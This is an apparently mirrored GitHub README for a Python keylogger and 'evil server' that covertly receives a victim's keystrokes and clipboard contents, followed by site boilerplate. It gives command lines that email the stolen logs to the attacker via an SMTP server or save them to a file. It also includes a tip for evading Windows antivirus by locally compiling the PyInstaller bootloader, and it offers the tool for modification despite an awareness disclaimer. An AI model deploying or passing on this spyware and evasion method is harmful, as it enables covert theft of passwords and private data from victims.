Giter Site home page Giter Site logo

jsmoreira02 / keylogger-evil_server Goto Github PK

View Code? Open in Web Editor NEW
4.0 1.0 4.0 65 KB

Advanced keylogger and covert channel - for receiving victim's keystrokes and clipboard data. You can send the results to the attacker's Email when the execution is finished, as well as write the digits from the target machine locally to a file

License: GNU General Public License v3.0

Python 97.86% Makefile 2.14%
black-hat-python covert-channel cybersecurity-awareness hacking hacking-tool keylogger-python malicious-scripts keylogger

keylogger-evil_server's Introduction

272844130-8c3b2b16-ae6d-467b-82a3-0e8c0b89c46a-removebg-preview

Evil keylogger server (Covert Channel)

  • Feel free to modify it as you see fit and it can be improved in many ways to suit your needs.

This project focuses on a malicious server that remotely receives keyboard logs and data saved on the victim's clipboard, emulating an illegal covert channel between the victim and the attacker. When the victim runs the keylogger, the first thing it will do is connect to the attacker's remote server and send the logs in real time. It has been carefully designed to present the keyboard logs in the most user-friendly way possible.

(Remember to add your local or proxy IP address in the keylogger script)

Evading the antivirus (Windows 10/11):

Simple technique: Compile the PyInstaller bootloader locally using Microsoft C/C++ compiler and then use pyinstaller to compile the keylogger code.

Optionals

Send the keyboard logs to the attacker's e-mail address

./app.py 192.168.32.34 -e smtp.gmail.com

Peek 12-01-2024 00-33

Write the keystroke logs to a file

./app.py 192.168.18.20 -f keylogs.txt

Peek 12-01-2024 00-34

Warning:

I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept and is intended to raise awareness about cybersecurity

keylogger-evil_server's People

Contributors

jsmoreira02 avatar

Stargazers

 avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.